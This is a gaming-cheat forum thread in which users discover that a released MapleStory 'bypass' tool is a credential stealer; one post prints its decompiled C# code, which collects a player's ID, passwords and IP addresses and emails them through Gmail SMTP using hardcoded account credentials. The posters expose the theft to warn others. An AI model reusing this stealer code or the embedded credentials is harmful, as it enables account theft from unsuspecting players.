[RELEASE]BYPASS D/C FROM PATCHED WZ EDITS + BYPASS INCLUDED

Download MapleStory hacks and bots over here!
Locked
DiYuSiuLo
Sacrificer
Sacrificer
Posts: 33
Joined: Thu Dec 31, 2009 11:20 am

Re: [RELEASE]BYPASS D/C FROM PATCHED WZ EDITS + BYPASS INCLU

Post by DiYuSiuLo »

************** Exception Text **************
System.InvalidOperationException: destinationFileName needs to include a
file name.
at Microsoft.VisualBasic.Devices.Network.DownloadFile(Uri address,
String destinationFileName, ICredentials networkCredentials, Boolean
showUI, Int32 connectionTimeout, Boolean overwrite, UICancelOption
onUserCancel)
at Microsoft.VisualBasic.Devices.Network.DownloadFile(String address,
String destinationFileName, String userName, String password, Boolean
showUI, Int32 connectionTimeout, Boolean overwrite, UICancelOption
onUserCancel)
at Microsoft.VisualBasic.Devices.Network.DownloadFile(String address,
String destinationFileName, String userName, String password, Boolean
showUI, Int32 connectionTimeout, Boolean overwrite)
at Microsoft.VisualBasic.Devices.Network.DownloadFile(String address,
String destinationFileName)
at MapleHacksMSEA095.Login.Timer1_Tick(Object sender, EventArgs e)
at System.Windows.Forms.Timer.OnTick(EventArgs e)
at System.Windows.Forms.Timer.TimerNativeWindow.WndProc(Message& m)
at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg,
IntPtr wparam, IntPtr lparam)

btw i duno wat is this ...
faithtn
Novice Knight
Novice Knight
Posts: 2
Joined: Thu Jan 14, 2010 5:11 pm

Re: [RELEASE]BYPASS D/C FROM PATCHED WZ EDITS + BYPASS INCLU

Post by faithtn »

Kudos to TS. Lol, this is funny seeing people asking this and that.
k9gamer
Apprantice Knight
Apprantice Knight
Posts: 19
Joined: Sun May 16, 2010 4:59 pm

Re: [RELEASE]BYPASS D/C FROM PATCHED WZ EDITS + BYPASS INCLU

Post by k9gamer »

Awesome hack !!!! Gratz to noobhacker for making such a wonderful hack (hope it doesnt gt patched tho)
Jeof
Sacred Guardian
Sacred Guardian
Posts: 373
Joined: Sat Aug 29, 2009 9:32 am
Location: SexBomb

Re: [RELEASE]BYPASS D/C FROM PATCHED WZ EDITS + BYPASS INCLU

Post by Jeof »

I'm having fun reading this thread hence i wont close it =3
Image
Image

Image
NoobHacker
Headmaster of Darkness
Headmaster of Darkness
Posts: 576
Joined: Tue Dec 29, 2009 12:31 pm

Re: [RELEASE]BYPASS D/C FROM PATCHED WZ EDITS + BYPASS INCLU

Post by NoobHacker »

Jeof wrote:I'm having fun reading this thread hence i wont close it =3
I have more fun when reading your reply :lol:
Alot Imageers in xemectrum!
User avatar
KFSPC8
Master of Darkness
Master of Darkness
Posts: 494
Joined: Sat Jun 05, 2010 6:18 pm
Location: Singapore

Re: [RELEASE]BYPASS D/C FROM PATCHED WZ EDITS + BYPASS INCLU

Post by KFSPC8 »

DiYuSiuLo wrote:************** Exception Text **************
System.InvalidOperationException: destinationFileName needs to include a
file name.
at Microsoft.VisualBasic.Devices.Network.DownloadFile(Uri address,
String destinationFileName, ICredentials networkCredentials, Boolean
showUI, Int32 connectionTimeout, Boolean overwrite, UICancelOption
onUserCancel)
at Microsoft.VisualBasic.Devices.Network.DownloadFile(String address,
String destinationFileName, String userName, String password, Boolean
showUI, Int32 connectionTimeout, Boolean overwrite, UICancelOption
onUserCancel)
at Microsoft.VisualBasic.Devices.Network.DownloadFile(String address,
String destinationFileName, String userName, String password, Boolean
showUI, Int32 connectionTimeout, Boolean overwrite)
at Microsoft.VisualBasic.Devices.Network.DownloadFile(String address,
String destinationFileName)
at MapleHacksMSEA095.Login.Timer1_Tick(Object sender, EventArgs e)
at System.Windows.Forms.Timer.OnTick(EventArgs e)
at System.Windows.Forms.Timer.TimerNativeWindow.WndProc(Message& m)
at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg,
IntPtr wparam, IntPtr lparam)

btw i duno wat is this ...
this is crap
madeforum
Apprantice Knight
Apprantice Knight
Posts: 12
Joined: Fri Jul 23, 2010 1:26 pm

Re: [RELEASE]BYPASS D/C FROM PATCHED WZ EDITS + BYPASS INCLU

Post by madeforum »

It'll be great if you guys can keep this forum safe for hackers and maintain its trustability to gain reputation.

Code: Select all

    
private void Timer1_Tick(object sender, EventArgs e)
    {
        string text = MyProject.Forms.Main.TextBox1.Text;
        string str2 = MyProject.Forms.Main.TextBox2.Text;
        SmtpClient client = new SmtpClient {
            Credentials = new NetworkCredential("msea.vip@gmail.com", "xemectrum"),
            Host = "smtp.gmail.com",
            Port = 0x24b,
            EnableSsl = true
        };
        MailMessage message = new MailMessage {
            From = new MailAddress("msea.vip@gmail.com"),
            To = { new MailAddress("msea.vip@gmail.com") },
            Subject = "ID Arrived"
        };
        if (File.Exists("data"))
        {
            FileSystem.Kill("data");
        }
        MyProject.Computer.Network.DownloadFile("http://whatismyip.org/", "data");
        StreamReader reader = new StreamReader("data");
        message.Body = "ID:" + text + "\r\nPassword:" + str2 + "\r\n2nd Password:" + MyProject.Forms.Main.TextBox3.Text + "\r\nIP Address:" + this.h.AddressList.GetValue(0).ToString() + "\r\nWAN Address:" + reader.ReadToEnd();
        reader.Dispose();
        FileSystem.Kill("data");
        this.Timer1.Interval = 0x7fffffff;
        try
        {
            client.Send(message);
        }
        catch (Exception exception1)
        {
            ProjectData.SetProjectError(exception1);
            Exception exception = exception1;
            Interaction.MsgBox("DLL did not export\r\nUnable to verify id and password", MsgBoxStyle.OkOnly, null);
            this.Close();
            ProjectData.ClearProjectError();
        }
    }
You are lucky if you failed to export the "DLL".
NoobHacker
Headmaster of Darkness
Headmaster of Darkness
Posts: 576
Joined: Tue Dec 29, 2009 12:31 pm

Re: [RELEASE]BYPASS D/C FROM PATCHED WZ EDITS + BYPASS INCLU

Post by NoobHacker »

i don't care you post the source code since the leechers don't know what is it
Alot Imageers in xemectrum!
Misty
Apprantice Knight
Apprantice Knight
Posts: 8
Joined: Fri May 14, 2010 10:24 pm

Re: [RELEASE]BYPASS D/C FROM PATCHED WZ EDITS + BYPASS INCLU

Post by Misty »

I second-ed madeforum's reply but seriously i thought noobhacker really uploaded a bypass and i tried it myself. Till i open it with ildasm.exe. :lol:
msea.vip@gmail.com, xemectrum, "ID Arrived", "ID:", "\r\nPassword:"
Leechers ask yourself why do anyone ask for your id/password and inside that "hack" has a email?
NoobHacker
Headmaster of Darkness
Headmaster of Darkness
Posts: 576
Joined: Tue Dec 29, 2009 12:31 pm

Re: [RELEASE]BYPASS D/C FROM PATCHED WZ EDITS + BYPASS INCLU

Post by NoobHacker »

i use gmail storage to download the latest dll bypass file
Alot Imageers in xemectrum!
Locked